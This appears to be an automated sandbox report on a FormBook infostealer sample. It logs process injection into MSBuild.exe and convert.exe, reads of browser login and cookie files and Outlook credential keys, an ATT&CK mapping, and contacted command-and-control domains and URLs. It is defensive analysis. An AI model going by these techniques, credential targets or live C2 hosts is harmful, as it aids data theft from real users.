Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQueryAttributesFile: Direct from: 0x77672E6C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtSetInformationThread: Direct from: 0x77672B4C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtOpenSection: Direct from: 0x77672E0C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQueryVolumeInformationFile: Direct from: 0x77672F2C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtAllocateVirtualMemory: Direct from: 0x776748EC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtSetInformationThread: Direct from: 0x776663F9	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtReadVirtualMemory: Direct from: 0x77672E8C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtCreateKey: Direct from: 0x77672C6C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtWriteVirtualMemory: Direct from: 0x7767490C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtAllocateVirtualMemory: Direct from: 0x77673C9C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtDelayExecution: Direct from: 0x77672DDC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtCreateUserProcess: Direct from: 0x7767371C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQuerySystemInformation: Direct from: 0x77672DFC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQueryInformationProcess: Direct from: 0x77672C26	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtResumeThread: Direct from: 0x77672FBC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtReadFile: Direct from: 0x77672ADC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtAllocateVirtualMemory: Direct from: 0x77672BFC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtResumeThread: Direct from: 0x776736AC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtSetInformationProcess: Direct from: 0x77672C5C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtMapViewOfSection: Direct from: 0x77672D1C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtNotifyChangeKey: Direct from: 0x77673C2C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtWriteVirtualMemory: Direct from: 0x77672E3C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtCreateMutant: Direct from: 0x776735CC	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\SysWOW64\convert.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\convert.exe

Thread register set: target process: 6488

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\convert.exe

Thread APC queued: target process: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 96B008	Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000000.1642778895.0000000001420000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510660428.0000000001421000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000000.1785950293.0000000000E01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000000.1642778895.0000000001420000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510660428.0000000001421000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000000.1785950293.0000000000E01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000000.1642778895.0000000001420000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510660428.0000000001421000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000000.1785950293.0000000000E01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000000.1642778895.0000000001420000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510660428.0000000001421000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000000.1785950293.0000000000E01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Queries volume information: C:\Users\user\Desktop\9B1ZyhsFUq.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\convert.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	612 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9B1ZyhsFUq.exe	41%	Virustotal		Browse
9B1ZyhsFUq.exe	55%	ReversingLabs	Win32.Trojan.Leonem

Source	Detection	Scanner	Link
theridleysuk.co.uk	0%	Virustotal	Browse
d99qtpkvavjj.xyz	2%	Virustotal	Browse
www.firmshow.top	0%	Virustotal	Browse
www.jl800.vip	0%	Virustotal	Browse
www.jl884.vip	7%	Virustotal	Browse
www.cloudsoda.xyz	4%	Virustotal	Browse
www.d99qtpkvavjj.xyz	1%	Virustotal	Browse
www.theridleysuk.co.uk	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://www.theridleysuk.co.uk	0%	Virustotal		Browse
https://investdirectinsurance.com/assuence/litesolidCha/Footer.cli	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.jl800.vip/g67v/	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Footer.cli	0%	Avira URL Cloud	safe
http://www.jl800.vip/g67v/	0%	Avira URL Cloud	safe
http://www.theridleysuk.co.uk	0%	Avira URL Cloud	safe
http://www.d99qtpkvavjj.xyz/r4rr/	0%	Avira URL Cloud	safe
http://www.theridleysuk.co.uk/frbh/	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Oszina.cli	0%	Avira URL Cloud	safe
https://github.com/HerpDerpinstine/bHapticsLib	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.d99qtpkvavjj.xyz/r4rr/	0%	Virustotal		Browse
http://www.theridleysuk.co.uk/frbh/	0%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.firmshow.top/02nb/?odlXV=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71fP4xTcu1wI0JIyM1RMLSZxEp7JGf5Q==&3rb=9LUll6	0%	Avira URL Cloud	safe
http://www.firmshow.top/02nb/	0%	Avira URL Cloud	safe
https://github.com/HerpDerpinstine/bHapticsLib	0%	Virustotal		Browse
http://www.jl884.vip/r4wk/?odlXV=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOJebRDbzl2T1aaRGoo2pz4PsH3zqV1w==&3rb=9LUll6	0%	Avira URL Cloud	safe
http://www.firmshow.top/02nb/	5%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Virustotal		Browse
https://investdirectinsurance.com/assuence/litesolidCha/Oszina.cli	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
theridleysuk.co.uk	3.33.130.190	true	false	0%, Virustotal, Browse	unknown
d99qtpkvavjj.xyz	3.33.130.190	true	true	2%, Virustotal, Browse	unknown
www.firmshow.top	203.161.43.228	true	false	0%, Virustotal, Browse	unknown
e6375a47.jl884.vip.cname.scname.com	38.47.158.160	true	false		unknown
8418a72e.jl800.vip.cname.scname.com	38.47.158.215	true	false		unknown
investdirectinsurance.com	172.67.189.102	true	false		unknown
www.d99qtpkvavjj.xyz	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.jl884.vip	unknown	unknown	true	7%, Virustotal, Browse	unknown
www.jl800.vip	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.theridleysuk.co.uk	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.cloudsoda.xyz	unknown	unknown	true	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://investdirectinsurance.com/assuence/litesolidCha/Footer.cli	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jl800.vip/g67v/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.d99qtpkvavjj.xyz/r4rr/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.theridleysuk.co.uk/frbh/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Oszina.cli	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.firmshow.top/02nb/?odlXV=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71fP4xTcu1wI0JIyM1RMLSZxEp7JGf5Q==&3rb=9LUll6	false	Avira URL Cloud: safe	unknown
http://www.firmshow.top/02nb/	false	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jl884.vip/r4wk/?odlXV=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOJebRDbzl2T1aaRGoo2pz4PsH3zqV1w==&3rb=9LUll6	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.theridleysuk.co.uk	nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2514005145.0000000004B9D000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	9B1ZyhsFUq.exe, 00000000.00000002.1293384927.0000000003170000.00000004.00000800.00020000.00000000.sdmp, 9B1ZyhsFUq.exe, 00000000.00000002.1293384927.00000000030E0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/HerpDerpinstine/bHapticsLib	9B1ZyhsFUq.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	convert.exe, 0000000B.00000002.2512955277.00000000045BA000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.0000000002F7A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
203.161.43.228	www.firmshow.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	false
172.67.189.102	investdirectinsurance.com	United States	13335	CLOUDFLARENETUS	false
38.47.158.215	8418a72e.jl800.vip.cname.scname.com	United States	174	COGENT-174US	false
3.33.130.190	theridleysuk.co.uk	United States	8987	AMAZONEXPANSIONGB	true
38.47.158.160	e6375a47.jl884.vip.cname.scname.com	United States	174	COGENT-174US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483420
Start date and time:	2024-07-27 11:38:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9B1ZyhsFUq.exe renamed because original name is a hash value
Original Sample Name:	d1743c107eedb9e740537df6cd35db93dd2a45ea952f4712ca134846dba1c7e5.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@7/5
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 94% Number of executed functions: 87 Number of non-executed functions: 255
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.165.165.26, 2.19.126.163, 2.19.126.137, 20.3.187.198, 93.184.221.240, 13.95.31.18
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu.azureedge.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, PID 892 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:40:22	API Interceptor	938372x Sleep call for process: convert.exe modified

Joe Sandbox View / Context

IPs

